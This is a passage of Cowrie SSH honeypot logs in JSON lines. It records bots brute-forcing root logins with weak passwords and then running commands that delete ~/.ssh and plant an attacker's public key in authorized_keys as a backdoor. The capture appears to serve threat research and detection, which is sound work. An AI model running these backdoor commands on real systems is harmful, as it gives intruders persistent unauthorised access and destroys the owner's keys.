~","sensor":"my-vps","timestamp":"2025-09-08T23:47:34.161198Z","src_ip":"182.18.161.165","session":"6a0abc8fb4c1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:47:34.423024Z","src_ip":"182.18.161.165","session":"6a0abc8fb4c1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:47:34.424041Z","src_ip":"182.18.161.165","session":"6a0abc8fb4c1"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":34792,"dst_ip":"1.2.3.4","dst_port":22,"session":"0767df40a01e","protocol":"ssh","message":"New connection: 182.18.161.165:34792 (1.2.3.4:22) [session: 0767df40a01e]","sensor":"my-vps","timestamp":"2025-09-08T23:47:34.662545Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:47:34.663573Z","src_ip":"182.18.161.165","session":"0767df40a01e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:47:34.909239Z","src_ip":"182.18.161.165","session":"0767df40a01e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:47:35.932589Z","src_ip":"182.18.161.165","session":"0767df40a01e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:47:37.180749Z","src_ip":"182.18.161.165","session":"0767df40a01e"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":34804,"dst_ip":"1.2.3.4","dst_port":22,"session":"2375a6f20322","protocol":"ssh","message":"New connection: 182.18.161.165:34804 (1.2.3.4:22) [session: 2375a6f20322]","sensor":"my-vps","timestamp":"2025-09-08T23:47:37.428384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:47:37.429883Z","src_ip":"182.18.161.165","session":"2375a6f20322"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:47:37.679421Z","src_ip":"182.18.161.165","session":"2375a6f20322"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:47:38.719726Z","src_ip":"182.18.161.165","session":"2375a6f20322"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:47:38.970950Z","src_ip":"182.18.161.165","session":"2375a6f20322"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:47:38.977477Z","src_ip":"182.18.161.165","session":"6a0abc8fb4c1"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":33072,"dst_ip":"1.2.3.4","dst_port":22,"session":"b07d950f43d2","protocol":"ssh","message":"New connection: 46.101.8.63:33072 (1.2.3.4:22) [session: b07d950f43d2]","sensor":"my-vps","timestamp":"2025-09-08T23:47:54.829091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:47:54.829969Z","src_ip":"46.101.8.63","session":"b07d950f43d2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:47:54.852889Z","src_ip":"46.101.8.63","session":"b07d950f43d2"}
{"eventid":"cowrie.login.success","username":"root","password":"admin!@34","message":"login attempt [root/admin!@34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:47:54.986127Z","src_ip":"46.101.8.63","session":"b07d950f43d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:47:55.097932Z","src_ip":"46.101.8.63","session":"b07d950f43d2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:47:55.098608Z","src_ip":"46.101.8.63","session":"b07d950f43d2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:47:55.099829Z","src_ip":"46.101.8.63","session":"b07d950f43d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:47:55.123930Z","src_ip":"46.101.8.63","session":"b07d950f43d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:47:55.186781Z","src_ip":"46.101.8.63","session":"b07d950f43d2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:47:55.187467Z","src_ip":"46.101.8.63","session":"b07d950f43d2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:47:55.212654Z","src_ip":"46.101.8.63","session":"b07d950f43d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:47:55.213368Z","src_ip":"46.101.8.63","session":"b07d950f43d2"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":33258,"dst_ip":"1.2.3.4","dst_port":22,"session":"d19f2dba3ee5","protocol":"ssh","message":"New connection: 46.101.8.63:33258 (1.2.3.4:22) [session: d19f2dba3ee5]","sensor":"my-vps","timestamp":"2025-09-08T23:47:55.233621Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:47:55.234311Z","src_ip":"46.101.8.63","session":"d19f2dba3ee5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:47:55.255762Z","src_ip":"46.101.8.63","session":"d19f2dba3ee5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:47:55.383688Z","src_ip":"46.101.8.63","session":"d19f2dba3ee5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:47:56.406940Z","src_ip":"46.101.8.63","session":"d19f2dba3ee5"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":33810,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab06e5439eb4","protocol":"ssh","message":"New connection: 46.101.8.63:33810 (1.2.3.4:22) [session: ab06e5439eb4]","sensor":"my-vps","timestamp":"2025-09-08T23:47:56.427840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:47:56.428645Z","src_ip":"46.101.8.63","session":"ab06e5439eb4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:47:56.450851Z","src_ip":"46.101.8.63","session":"ab06e5439eb4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:47:56.583144Z","src_ip":"46.101.8.63","session":"ab06e5439eb4"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:47:56.606437Z","src_ip":"46.101.8.63","session":"ab06e5439eb4"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:47:56.607354Z","src_ip":"46.101.8.63","session":"b07d950f43d2"}
{"eventid":"cowrie.session.closed","duration":120.00277328491211,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:48:03.159053Z","src_ip":"43.224.126.107","session":"7c124d45a737"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39772,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4e529fec663","protocol":"ssh","message":"New connection: 212.227.235.229:39772 (1.2.3.4:22) [session: a4e529fec663]","sensor":"my-vps","timestamp":"2025-09-08T23:48:10.958413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:48:10.959435Z","src_ip":"212.227.235.229","session":"a4e529fec663"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:48:11.270313Z","src_ip":"212.227.235.229","session":"a4e529fec663"}
{"eventid":"cowrie.login.success","username":"root","password":"admin)2024","message":"login attempt [root/admin)2024] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:48:12.789176Z","src_ip":"212.227.235.229","session":"a4e529fec663"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:48:13.813876Z","src_ip":"212.227.235.229","session":"a4e529fec663"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:48:13.814541Z","src_ip":"212.227.235.229","session":"a4e529fec663"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:48:13.815309Z","src_ip":"212.227.235.229","session":"a4e529fec663"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:48:14.127620Z","src_ip":"212.227.235.229","session":"a4e529fec663"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:48:14.807196Z","src_ip":"212.227.235.229","session":"a4e529fec663"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:48:14.807877Z","src_ip":"212.227.235.229","session":"a4e529fec663"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:48:15.121934Z","src_ip":"212.227.235.229","session":"a4e529fec663"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:48:15.122881Z","src_ip":"212.227.235.229","session":"a4e529fec663"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54226,"dst_ip":"1.2.3.4","dst_port":22,"session":"6dfd26219558","protocol":"ssh","message":"New connection: 212.227.235.229:54226 (1.2.3.4:22) [session: 6dfd26219558]","sensor":"my-vps","timestamp":"2025-09-08T23:48:15.431502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:48:15.432511Z","src_ip":"212.227.235.229","session":"6dfd26219558"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.